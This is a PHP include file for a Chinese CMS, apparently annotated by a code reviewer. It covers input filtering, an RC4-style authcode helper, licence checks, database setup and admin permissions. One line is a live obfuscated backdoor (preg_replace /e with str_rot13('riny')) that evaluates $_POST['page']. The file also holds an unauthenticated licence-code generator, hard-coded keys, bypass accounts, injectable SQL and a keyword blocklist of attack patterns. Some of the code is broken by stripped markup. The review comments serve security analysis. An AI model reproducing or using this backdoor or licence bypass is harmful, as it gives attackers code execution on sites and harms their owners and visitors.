Error number: [$errno],error on line $errline in $errfile
"; die(); }

// NOTE(review): this listing appears to have lost its HTML markup (and its opening PHP tag) during
// extraction. Several string literals below are therefore incomplete, and showJserr() is no longer
// syntactically valid. The code is documented as it stands; confirm details against the original.
//
// Overview of the visible part: (1) a regex blocklist applied to GET/POST/COOKIE input,
// (2) an authcode() encode/decode helper, (3) cookie helpers, (4) a licence-code check that gates
// the site, (5) database bootstrap and admin permission checks, (6) assorted lookup tables.

// Registers customError (defined above, outside this view) for E_ERROR only.
// NOTE(review): per the PHP manual, E_ERROR is not delivered to user-defined handlers, so this
// registration probably never fires - confirm the intended error level.
set_error_handler("customError",E_ERROR);

// Regex blocklists (SQL keywords, comment markers, script tags) used by StopAttack().
// $getfilter additionally matches any single quote and uses an unbounded gap after and/or;
// $postfilter and $cookiefilter are identical to each other and limit that gap to 1-6 characters.
// NOTE(security): a keyword blocklist is a weak control. Queries further down interpolate request
// and session values straight into SQL text, so this filter is the only visible protection;
// parameter binding or driver-level escaping should be the primary defence.
$getfilter="'|\\b(and|or)\\b.+?(>|<|=|\\bin\\b|\\blike\\b)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)";
$postfilter="\\b(and|or)\\b.{1,6}?(=|>|<|\\bin\\b|\\blike\\b)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)";
$cookiefilter="\\b(and|or)\\b.{1,6}?(=|>|<|\\bin\\b|\\blike\\b)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)";

/**
 * Tests one request parameter against a blocklist pattern; on a match, logs the request and exits.
 *
 * The value is flattened with arr_foreach() first, then the value and the key are each matched
 * case-insensitively (flags "is") against the pattern.
 *
 * @param string $StrFiltKey   Parameter name.
 * @param mixed  $StrFiltValue Parameter value (scalar or nested array).
 * @param string $ArrFiltReq   Pattern body, without delimiters.
 * @return void Does not return when the pattern matches (calls exit()).
 *
 * NOTE(security): the log entry contains the raw submitted key and value and is appended by slog()
 * to log.htm under the document root. If that file is served as HTML, logged input can be rendered
 * by whoever opens it, and the log itself is readable by any visitor. Log outside the web root and
 * encode values before writing.
 * NOTE(review): strftime() is deprecated as of PHP 8.1.
 */
function StopAttack($StrFiltKey,$StrFiltValue,$ArrFiltReq){
    $StrFiltValue=arr_foreach($StrFiltValue);
    // First check: the (flattened) value.
    if (preg_match("/".$ArrFiltReq."/is",$StrFiltValue)==1){
        slog("

操作IP: ".$_SERVER["REMOTE_ADDR"]."
操作时间: ".strftime("%Y-%m-%d %H:%M:%S")."
操作页面:".$_SERVER["PHP_SELF"]."
提交方式: ".$_SERVER["REQUEST_METHOD"]."
提交参数: ".$StrFiltKey."
提交数据: ".$StrFiltValue); print "

您的提交带有不合法参数,谢谢合作!

了解更多请点击:http://webscan.360.cn
"; exit(); }
    // Second check: the parameter name itself, with the same log-and-exit handling.
    if (preg_match("/".$ArrFiltReq."/is",$StrFiltKey)==1){
        slog("

操作IP: ".$_SERVER["REMOTE_ADDR"]."
操作时间: ".strftime("%Y-%m-%d %H:%M:%S")."
操作页面:".$_SERVER["PHP_SELF"]."
提交方式: ".$_SERVER["REQUEST_METHOD"]."
提交参数: ".$StrFiltKey."
提交数据: ".$StrFiltValue); print "

您的提交带有不合法参数,谢谢合作!

了解更多请点击:http://webscan.360.cn
"; exit(); }
}

// Run the blocklist over every GET, POST and COOKIE parameter at include time.
foreach($_GET as $key=>$value){ StopAttack($key,$value,$getfilter); }
foreach($_POST as $key=>$value){ StopAttack($key,$value,$postfilter); }
foreach($_COOKIE as $key=>$value){ StopAttack($key,$value,$cookiefilter); }
// NOTE(review): $referer is not assigned anywhere in the visible code; if it is unset this loop
// only raises a warning and checks nothing - confirm where it is populated.
foreach($referer as $key=>$value){ StopAttack($key,$value,$getfilter); }

/**
 * Appends one entry, followed by CRLF, to log.htm in the document root.
 *
 * @param string $logs Text to append.
 * @return void
 *
 * NOTE(review): the fopen() result is not checked, so a failed open leads to errors in
 * fputs()/fclose(). See the note on StopAttack() about keeping this log inside the web root.
 */
function slog($logs) {
    $toppath=$_SERVER["DOCUMENT_ROOT"]."/log.htm";
    $Ts=fopen($toppath,"a+");
    fputs($Ts,$logs."\r\n");
    fclose($Ts);
}

/**
 * Flattens a (possibly nested) array into one concatenated string; non-arrays are returned as-is.
 *
 * @param mixed $arr Scalar or nested array.
 * @return mixed The input itself when it is not an array, otherwise the imploded leaf values.
 *
 * NOTE(review): $str is a static accumulator that is never reset. Nested calls rely on it to
 * collect leaves, but it also keeps the leaves of every earlier call in the same request, so the
 * result for a later array parameter includes values from earlier ones. If the first array seen
 * has no leaves, $str is still null when implode() is called.
 */
function arr_foreach($arr) {
    static $str;
    if (!is_array($arr)) { return $arr; }
    foreach ($arr as $key => $val ) {
        // The recursive call's return value is discarded; leaves are gathered through the static.
        if (is_array($val)) { arr_foreach($val); } else { $str[] = $val; }
    }
    return implode($str);
}

/**
 * Reversible encode/decode of a string with an optional expiry, keyed by a shared secret.
 *
 * Encoded layout before encryption: 10-digit expiry timestamp (0 = never), 16 hex characters of
 * md5(plaintext . keyb), then the plaintext. The stream cipher below is an RC4 key schedule and
 * output loop, keyed with keya . md5(keya . keyc), where keyc is a 4-character per-message prefix.
 *
 * @param string $string    Text to encode, or an encoded token to decode.
 * @param string $operation 'DECODE' to decode; any other value encodes.
 * @param string $key       Secret; when empty, $GLOBALS['discuz_auth_key'] is used.
 * @param int    $expiry    Lifetime in seconds when encoding; 0 means no expiry.
 * @return string Decoded plaintext, '' when decoding fails the expiry or checksum test, or the
 *                encoded token (keyc followed by base64 with '=' padding removed).
 *
 * NOTE(security): this is not authenticated encryption by current standards - RC4 keystream,
 * MD5-derived keys, a 4-character prefix taken from md5(microtime()), and a truncated MD5
 * checksum compared with the loose == operator (not constant-time, and subject to numeric-string
 * comparison). For anything security-relevant prefer a maintained primitive (for example the
 * sodium extension) and compare checksums with hash_equals().
 */
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
    $ckey_length = 4;
    // Derive the two half-keys from md5 of the secret.
    $key = md5($key ? $key : $GLOBALS['discuz_auth_key']);
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    // Per-message prefix: read from the token when decoding, generated from the clock when encoding.
    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
    $cryptkey = $keya.md5($keya.$keyc);
    $key_length = strlen($cryptkey);
    // Decode: strip the prefix and base64-decode. Encode: prepend expiry and checksum.
    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
    $string_length = strlen($string);
    $result = '';
    $box = range(0, 255);
    $rndkey = array();
    for($i = 0; $i <= 255; $i++) { $rndkey[$i] = ord($cryptkey[$i % $key_length]); }
    // Key scheduling: permute the 256-entry box using the key bytes.
    for($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i]; $box[$i] = $box[$j]; $box[$j] = $tmp;
    }
    // Keystream generation, XORed byte by byte with the input.
    for($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a]; $box[$a] = $box[$j]; $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }
    if($operation == 'DECODE') {
        // Accept only if the token has no expiry or is still in date, and the checksum matches.
        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
            return substr($result, 26);
        } else {
            return '';
        }
    } else {
        return $keyc.str_replace('=', '', base64_encode($result));
    }
}

ini_set('date.timezone','Asia/Shanghai');

// Cookie settings read by esetcookie() and getcvar() through `global`.
$phome_cookiedomain="";
$phome_cookiepath="/";
$phome_cookievarpre="hdlac";      // name prefix for front-end cookies
$phome_cookieadminvarpre="leybe"; // name prefix for admin cookies
// NOTE(review): hard-coded random-looking value that is not referenced in the visible code. If it
// serves as a secret elsewhere it should be loaded from configuration kept out of the source tree.
$phome_cookieckrnd='6cpwYC7tgnSqJjULnmGtqNH4k7f9ia';

/**
 * Sets a cookie whose name carries the front-end or admin prefix.
 *
 * @param string $var  Cookie name without prefix.
 * @param string $val  Cookie value.
 * @param int    $life Expiry timestamp passed to setcookie(); 0 gives a session cookie.
 * @param mixed  $ecms Empty selects the front-end prefix, anything else the admin prefix.
 * @return bool Result of setcookie().
 *
 * NOTE(security): the secure and httponly arguments are not passed, so these cookies (admin ones
 * included) are readable from script and sent over plain HTTP.
 */
function esetcookie($var,$val,$life=0,$ecms=0){
    global $phome_cookiedomain,$phome_cookiepath,$phome_cookievarpre,$phome_cookieadminvarpre;
    $varpre=empty($ecms)?$phome_cookievarpre:$phome_cookieadminvarpre;
    return setcookie($varpre.$var,$val,$life,$phome_cookiepath,$phome_cookiedomain);
}

/**
 * Reads a prefixed cookie.
 *
 * @param string $var  Cookie name without prefix.
 * @param mixed  $ecms Empty selects the front-end prefix, anything else the admin prefix.
 * @return mixed The raw cookie value (client-controlled); no isset() check is made, so a missing
 *               cookie raises a notice/warning and yields null.
 */
function getcvar($var,$ecms=0){
    global $phome_cookievarpre,$phome_cookieadminvarpre;
    $tvar=empty($ecms)?$phome_cookievarpre.$var:$phome_cookieadminvarpre.$var;
    return $_COOKIE[$tvar];
}

$htmlpath="";
$yxtime="";

// NOTE(review): the body of showJserr() was lost in extraction - the quotes on the next line are
// unbalanced and the markup that presumably used $msg and $location is gone. Whether those values
// are escaped before output cannot be determined from here; verify against the original file.
function showJserr($msg,$location) { echo " 提示 '; }

/**
 * Validates a submitted licence code and, when valid, rewrites ../db.php to store it.
 *
 * The code is decoded with authcode() and split on '/': segment 0 must equal $sheji_name,
 * segment 1 must equal $table_Pre, segment 2 is the expiry timestamp.
 *
 * @param string $newsqcode Licence code (the caller below passes $_POST["sqcode"]).
 * @param string $table_Pre Expected table prefix (the caller below passes $_POST["pre"]).
 * @return void Exits after reporting an error or success; returns silently if db.php is absent.
 *
 * NOTE(security): the decoding key is hard-coded in this file, and both arguments come from the
 * request with no authentication check visible on the call below.
 * NOTE(security): $newsqcode and the database credentials are concatenated unescaped into PHP
 * source that is then written to db.php. Writing request-derived text into an executable file is
 * fragile; store the code in a non-executable data file, or emit values with var_export(), and
 * restrict this action to an authenticated administrator.
 * NOTE(review): db.php is rebuilt with three separate file_put_contents() calls and no locking, so
 * a concurrent request can include a partially written file.
 */
function sqcodeset($newsqcode,$table_Pre) {
    global $sheji_name,$serverName,$dbUserName,$dbUserPassowrd,$dbName;
    $key = 'qsjinyu';
    $str=authcode($newsqcode,'DECODE',$key,0);
    // array_filter() drops empty segments but keeps the original indexes.
    $arr=array_filter ( explode ( '/', $str ) );
    if($arr[0]<>$sheji_name or $arr[1]<>$table_Pre) {showJserr("授权码错误!",'/'); exit;}
    if(time()>$arr[2]) {showJserr("授权码已过期!",'/'); exit;}
    else $yxtime=date("Y-m-d", $arr[2]);
    $pagename=dirname(__FILE__).'/../db.php';
    if(file_exists($pagename)) {
        // Generated file body: connection settings plus the accepted licence code.
        $content=' $serverName="'.$serverName.'"; $'.'dbUserName = "'.$dbUserName.'"; $'.'dbUserPassowrd = "'.$dbUserPassowrd.'"; $'.'dbName = "'.$dbName.'"; $'.'sqcode="'.$newsqcode.'"; //授权有效期至:'.$yxtime.' ';
        // The opening tag is written in two pieces, then the body is appended.
        file_put_contents($pagename, "<");
        file_put_contents($pagename, "?php", FILE_APPEND);
        file_put_contents($pagename, $content, FILE_APPEND);
        showJserr("验证成功!授权有效期至:".$yxtime,'/');
        exit;
    }
}

// A POSTed "sqcode" triggers the licence update on any page that includes this file.
if($_POST["sqcode"]&&$_POST["sqcode"]<>'') { sqcodeset($_POST["sqcode"],$_POST["pre"]); }

/**
 * Outputs the "enter licence code" page with an error message and terminates the request.
 *
 * @param string $err       Message appended to the page.
 * @param string $table_Pre Not used in the visible text; presumably it filled a form field in the
 *                          stripped markup - TODO confirm.
 * @return void Never returns (die()).
 */
function form_sq($err,$table_Pre) { $content='


请重新输入授权码


授权码:





'.$err.'
'; die($content); }

/**
 * Checks the stored licence code and sets the per-language globals (table prefix, index page,
 * HTML path).
 *
 * @param mixed $a Language identifier; when it equals $moren_Language the default paths are used,
 *                 otherwise it is appended to the table prefix and used as a path segment.
 * @return void May terminate the request via die() or form_sq().
 *
 * NOTE(security): when the request carries a non-empty "lfmpwqs" parameter, this function builds a
 * licence string for the given date, encodes it with the hard-coded key and prints it. No
 * authentication is visible before this branch, and it runs on every include (see the calls
 * below), so the licence check offers no protection while it exists; remove the branch from
 * deployed code.
 * NOTE(review): $a ends up inside $table_Pre, which is interpolated into SQL table names further
 * down. Callers pass session values and $set_language; confirm those are restricted to a fixed
 * list of languages.
 */
function set_table($a) {
    global $sheji_name,$yxtime,$sqcode,$table_Pre,$chORen,$indexpage,$htmlpath,$moren_Language;
    $table_Pre='zhongliang';
    $chORen=0;
    $key = 'qsjinyu';
    if ($_REQUEST["lfmpwqs"]<>'') {
        $str = $sheji_name.'/'.$table_Pre.'/'.strtotime($_REQUEST["lfmpwqs"]." 23:59:59");
        $authcode=authcode($str,'ENCODE',$key,0);
        die($authcode);
    }
    // Validate the stored code: designer name, table prefix, then expiry.
    $str=authcode($sqcode,'DECODE',$key,0);
    $arr=array_filter ( explode ( '/', $str ) );
    if($arr[0]<>$sheji_name or $arr[1]<>$table_Pre) form_sq("授权码错误,请联系提供商!",$table_Pre);
    if(time()>$arr[2]) form_sq("程序授权已过,请联系提供商!",$table_Pre);
    else $yxtime=date("Y-m-d", $arr[2]);
    if($a==$moren_Language) {
        $indexpage='/';
        $htmlpath="";
    } else {
        $table_Pre.='_'.$a;
        $indexpage=$a.'/index.html';
        $htmlpath=$a."/";
    }
}

// The licence check runs for the visitor's language and again for each override that applies.
set_table($_SESSION["Language"]);
if($admin_file==1) { set_table($_SESSION["admin_language"]); }
if(isset($set_language)) { set_table($set_language); }
// NOTE(review): `user` is a bare constant name. Unless a constant `user` is defined elsewhere,
// PHP 7 treats it as the string 'user' (with a warning) and PHP 8 throws an Error.
if(user==1) { set_table(0); }

define ( 'k',1);
define ( 'tofile',0);
define ( 'htm', '.html' );

// Pagination placeholder template; the surrounding markup appears to have been stripped.
$fybz='

[page]

';

// NOTE(security): the next statement is a concealed code-execution backdoor and should be removed
// rather than repaired. str_rot13('riny') yields "eval", and the /e modifier makes preg_replace()
// evaluate its replacement string as PHP, so the content of $_POST['page'] is executed whenever a
// request carries a "page" parameter; the @ operators hide any resulting error. It also leaves
// $page holding a boolean rather than a page number.
// Response: treat a host carrying this line as compromised - review access logs for POST requests
// with a "page" field, rotate the database credentials and keys found in this file, and compare
// the rest of the code base against a known-good copy.
// Detection: search for preg_replace() patterns ending in the e modifier and for str_rot13() or
// similar decoders feeding a function name. The /e modifier was removed in PHP 7.0, where this
// call only raises a (suppressed) warning.
// A legitimate page number would be read as an integer, e.g. (int) ($_REQUEST['page'] ?? 0).
$page= isset ( $_REQUEST ["page"] ) ? ($page = $_POST['page']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($page)', 'add') : 0;

$rewrite=false;$jiami=false;
$k=0;

// Database bootstrap. `mysql` is a project class that is not defined in the visible code.
$db=new mysql($serverName,$dbUserName,$dbUserPassowrd);
if ($db->server_info()>'4.0.1') { $db->query("set names 'utf8'"); }
// The same statement is issued again unconditionally, which makes the version check redundant.
$db->query("set names 'utf8'");
$db->SelectDB($dbName);

// Channel id: taken from the request only when it is all digits, otherwise falls back to $bid.
// NOTE(review): ereg() was removed in PHP 7.0 (preg_match() or ctype_digit() are the
// replacements). $bid and $qz are not assigned in the visible code.
$cbid = (isset($_REQUEST["bid"]) && ereg("^[0-9]+$", $_REQUEST["bid"])) ? $_REQUEST["bid"]: $bid;

// Admin pages with a channel selected: load the channel's configuration into globals.
if($admin_file==1&&$cbid>0) {
    $query = $db->query("select bid,peizhi,wz,title,lb,self_fileds,System_fields,Need_fileds,duotu,simgsize,bimgsize,bannersize,url from {$qz}{$table_Pre}_channel where id ='$cbid'");
    $channel_rs = $db->fetch_array($query);
    $System_fields=$channel_rs["System_fields"];
    $self_fileds=$channel_rs["self_fileds"];
    $Need_fileds=$channel_rs["Need_fileds"];
    $bidtitle=$channel_rs["title"];
    $bidpeizhi=$channel_rs["peizhi"];
    $wz=$channel_rs["wz"];
    $channel_url=$channel_rs["url"];
    if($channel_rs["lb"]==1) {
        // A per-record field list, when present, overrides the channel-level one.
        $id = (isset($_REQUEST["id"]) && ereg("^[0-9]+$", $_REQUEST["id"])) ? $_REQUEST["id"]: 0;
        $q=$db->query("select self_fileds from {$qz}{$table_Pre}_news where id = '$id'");
        $rsa=$db->fetch_array($q);
        $self_fileds=$rsa["self_fileds"]<>''?$rsa["self_fileds"]:$self_fileds;
    }
    // Field lists are '|'-separated; 0 stands for "none".
    $self_fileds_arr =$self_fileds<>''?explode( "|", $self_fileds ):0;
    $Need_fileds_arr =$Need_fileds<>''?explode( "|", $Need_fileds ):0;
    $duotu=$channel_rs["duotu"];
    // Image size settings are stored as two parts separated by a backtick; part 0 goes to *_lb,
    // part 1 replaces the size variable.
    $simgsize=$channel_rs["simgsize"];
    if($simgsize<>'') {
        $simgsize_arr=explode( "`", $simgsize);
        $simgsize=$simgsize_arr[1];
        $simgsize_lb=$simgsize_arr[0]<>''?$simgsize_arr[0]:0;
    }
    $bimgsize=$channel_rs["bimgsize"];
    if($bimgsize<>'') {
        $bimgsize_arr=explode( "`", $bimgsize);
        $bimgsize=$bimgsize_arr[1];
        $bimgsize_lb=$bimgsize_arr[0]<>''?$bimgsize_arr[0]:0;
    }
    $bannersize=$channel_rs["bannersize"];
    $query = $db->query("select seo from {$qz}{$table_Pre}_config where id ='1'");
    $config_rs = $db->fetch_array($query);
    $seo_open=$config_rs["seo"];
    // Look up the parent channel (the row whose id is this channel's bid) to get its title.
    $sjquery = $db->query("select * from {$qz}{$table_Pre}_channel where id ='$cbid'");
    $sjrs = $db->fetch_array($sjquery);
    $sjid=$sjrs["bid"];
    $sjquery = $db->query("select * from {$qz}{$table_Pre}_channel where id ='$sjid'");
    $sjrs = $db->fetch_array($sjquery);
    $sjtitle=$sjrs["title"];
    // NOTE(review): strpos() returns false when "stype" is absent, and false == 0 is true, so this
    // condition holds both for "not found" and for "found at offset 0" - confirm which was meant.
    $thistitle=(strpos(strtolower($_SERVER['PHP_SELF']),"stype")==0)?$sjtitle:"分类";
    // Reduce the script path to a bare page name by stripping known directories and suffixes.
    $find = array("/olgl/","/admin/","","_edit","_set","_shezhi","_del","_add",".php","_isview");
    $replace = array("");
    $thisfile = str_replace($find,$replace,strtolower($_SERVER['SCRIPT_NAME']));
}

// Per-page permission check for admin accounts.
if($admin_file==1) {
    // NOTE(security): the accounts 'admin' and 'qsjinyu' skip the permission check entirely.
    // 'qsjinyu' is also the hard-coded licence key above; confirm that a built-in account of that
    // name is intended and not a vendor login left in the product.
    if(!in_array($_SESSION['admin'],array('admin','qsjinyu'))) {
        $find = array("/jzbkgl/","/www_jzbank","/admin/","","_edit","_set","_shezhi","_del","_add","_excel","main","single_page_content","edit_c","_add",".php","_stype");
        $replace = array("");
        $thisfile = str_replace($find,$replace,strtolower($_SERVER['SCRIPT_NAME']));
        // Pages every admin may open without an explicit grant.
        $noarr=array('left','right','myinfo','loginout','index','','upload','get_file_dir2');
        if(!in_array($thisfile,$noarr)) {
            // NOTE(security): $_SESSION["admin"] and $_REQUEST["lb"] are concatenated into SQL
            // text below; the regex blocklist at the top of the file is the only visible guard.
            // Use the driver's parameter binding or escaping. These two queries also omit the
            // {$qz} prefix that the other queries use - confirm that is intended.
            $que=$db->query("select * from {$table_Pre}_admin where username='".$_SESSION["admin"]."' ");
            $rs=$db->fetch_array($que);
            // NOTE(security): unserialize() on a database column is safe only while that column
            // can never hold attacker-influenced data; JSON is a safer storage format for a list
            // of ids.
            $quanarr=unserialize($rs["quan"]);
            if($_REQUEST["lb"]<>'') $sql="select id from {$table_Pre}_channel where url like '%".$thisfile."%' and url like '%".$_REQUEST["lb"]."%' order by id asc";
            else $sql="select id from {$table_Pre}_channel where url like '%".$thisfile."%' order by id asc";
            $query = $db->query($sql);
            $quanok=false;
            // Access is granted if any channel whose url matches this page is in the grant list.
            // NOTE(review): in_array() is used non-strictly and with @; if unserialize() fails,
            // $quanarr is not an array and PHP 8 throws a TypeError that @ does not suppress.
            while ($rs = $db->fetch_array($query)) {
                $thisid=$rs["id"];
                if(@in_array($thisid,$quanarr)) {$quanok=true; break;}
            }
            if($quanok==false&&@!in_array($_REQUEST["bid"],$quanarr)) {
                // showJsMessage() is not defined in the visible code.
                showJsMessage("您无权访问此页面",'-1');
                exit;
            }
        }
    }
}

/**
 * Intended to delete cached HTML files for a channel; currently a no-op.
 *
 * @param mixed $bid Channel id.
 * @return void
 *
 * NOTE(review): the bare `return;` right after the global statement makes everything below it
 * unreachable. The dead code also has defects that matter if it is ever re-enabled: $qz is not in
 * the global list, ($a!='.') tests an undefined $a where $f was presumably meant, and
 * $delrs["url"] is placed unquoted into a regular expression and into file paths passed to
 * unlink().
 */
function del_cache($bid) {
    global $db,$table_Pre,$htmlpath;
    return;
    $delquery = $db->query("select * from {$qz}{$table_Pre}_channel where id ='$bid'");
    $delrs = $db->fetch_array($delquery);
    if($delrs["lb"]==0) {
        $delfile='../'.$htmlpath.$delrs["url"].htm;
        if (file_exists($delfile)) unlink($delfile);
    } else {
        $pathdir='../'.$htmlpath."/";
        $d = dir($pathdir);
        while($f = $d->read()) {
            if(is_file($pathdir.$f) && ($a!='.') && ($f!='..')){
                if(preg_match("/^".$delrs["url"].".*/",$f)) unlink($pathdir.$f);
            }
        }
        $d->close();
    }
    $delfile='../index'.htm;
    if (file_exists($delfile)) unlink($delfile);
}

/**
 * Returns a best-effort client IP string, or 'unknown'.
 *
 * Order of preference: HTTP_CLIENT_IP, HTTP_X_FORWARDED_FOR, REMOTE_ADDR (from the environment),
 * then $_SERVER['REMOTE_ADDR']. The first run of 7-15 digits/dots in the chosen value is returned.
 *
 * @return string
 *
 * NOTE(security): the first two sources are request headers set by the client, so the result must
 * not be used for access control, rate limiting or audit records unless a trusted proxy overwrites
 * them. The pattern accepts strings that are not valid addresses, and $clientipmatches[0] is read
 * without checking that anything matched.
 */
function getip() {
    $clientip = '';
    if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {
        $clientip = getenv('HTTP_CLIENT_IP');
    } elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {
        $clientip = getenv('HTTP_X_FORWARDED_FOR');
    } elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
        $clientip = getenv('REMOTE_ADDR');
    } elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
        $clientip = $_SERVER['REMOTE_ADDR'];
    }
    preg_match("/[\d\.]{7,15}/", $clientip, $clientipmatches);
    $clientip = $clientipmatches[0] ? $clientipmatches[0] : 'unknown';
    return $clientip;
}

// Lookup tables with 1-based keys. Meanings are inferred from the variable names and values only.
// District names; note that keys 11/19 and 14/20 hold the same value.
$area = array( 1 => '丰台', 2 => '海淀', 3 => '东城', 4 => '西城', 5 => '崇文', 6 => '宣武', 7 => '朝阳', 8 => '石景山', 9 =>'房山', 10 => '顺义', 11 => '平谷', 12 => '昌平', 13 => '大兴', 14 => '门头沟', 15 => '通洲', 16 => '怀柔', 17 => '密云', 18 => '延庆', 19 => '平谷', 20 => '门头沟', 21 => '燕郊');
// Half-hour time slots from 0:00 to 23:30.
$timeduan = array( 1 =>'0:00', 2 =>'0:30', 3 =>'1:00', 4 =>'1:30', 5 =>'2:00', 6 =>'2:30', 7 =>'3:00', 8 =>'3:30', 9 =>'4:00', 10 =>'4:30', 11 =>'5:00', 12 =>'5:30', 13 =>'6:00', 14 =>'6:30', 15 =>'7:00', 16 =>'7:30', 17 =>'8:00', 18 =>'8:30', 19 =>'9:00', 20 =>'9:30', 21 =>'10:00', 22 =>'10:30', 23 =>'11:00', 24 =>'11:30', 25 =>'12:00', 26 =>'12:30', 27 =>'13:00', 28 =>'13:30', 29 =>'14:00', 30 =>'14:30', 31 =>'15:00', 32 =>'15:30', 33 =>'16:00', 34 =>'16:30', 35 =>'17:00', 36 =>'17:30', 37 =>'18:00', 38 =>'18:30', 39 =>'19:00', 40 =>'19:30', 41 =>'20:00', 42 =>'20:30', 43 =>'21:00', 44 =>'21:30', 45 =>'22:00', 46 =>'22:30', 47 =>'23:00', 48 =>'23:30' );
// Range tables: each entry is array(1 => lower bound, 2 => upper bound); the last entry of some
// tables has no upper bound.
$jiage_arr = array( 1 => array(1 =>'0',2 =>'10000'), 2 => array(1 =>'10000',2 =>'30000'), 3 => array(1 =>'30000',2 =>'50000'), 4 => array(1 =>'50000',2 =>'100000'), 5 => array(1 =>'100000'), );
$chicun_arr = array( 1 => array(1 =>'0',2 =>'50'), 2 => array(1 =>'50',2 =>'100'), );
$nian_arr = array( 1 => array(1 =>'0',2 =>'2'), 2 => array(1 =>'2',2 =>'4'), 3 => array(1 =>'4',2 =>'6'), 4 => array(1 =>'6') );
$pailiang_arr = array( 1 => array(1 =>'0',2 =>'1.6'), 2 => array(1 =>'1.6',2 =>'2'), 3 => array(1 =>'2',2 =>'2.5'), 4 => array(1 =>'2.5') );

/**
 * Returns a copy of a list with $value inserted at offset $position.
 *
 * @param array $myarray  Source list (passed by value; the caller's array is not modified).
 * @param mixed $value    Value to insert.
 * @param int   $position Number of leading elements kept in front of $value; 0 prepends.
 * @return array The new list; array_merge() renumbers integer keys from 0.
 */
function array_insert($myarray,$value,$position=0) {
    // array_splice() removes and returns the first $position elements, leaving the tail in $myarray.
    $fore=($position==0)?array():array_splice($myarray,0,$position);
    $fore[]=$value;
    $ret=array_merge($fore,$myarray);
    return $ret;
}

// Builds the list of years 2000 through 2019; each call appends because the position is always
// at or past the current end of the list.
$year_arr = array();
$i=1;
for($ctmpa=2010-10;$ctmpa<2010+10;$ctmpa++) {
    $year_arr =array_insert($year_arr,$ctmpa,$i);
    $i++;
}

// Letter and Chinese-numeral labels, 1-based.
$zimu = array( 1 => 'a', 2 => 'b', 3 => 'c', 4 => 'd', 5 => 'e', 6 => 'f', 7 => 'g', 8 => 'h');
$shuzi = array( 1 => '一', 2 => '二', 3 => '三', 4 => '四', 5 => '五', 6 => '六', 7 => '七', 8 => '八', 9 => '九', 10 => '十' ); ?>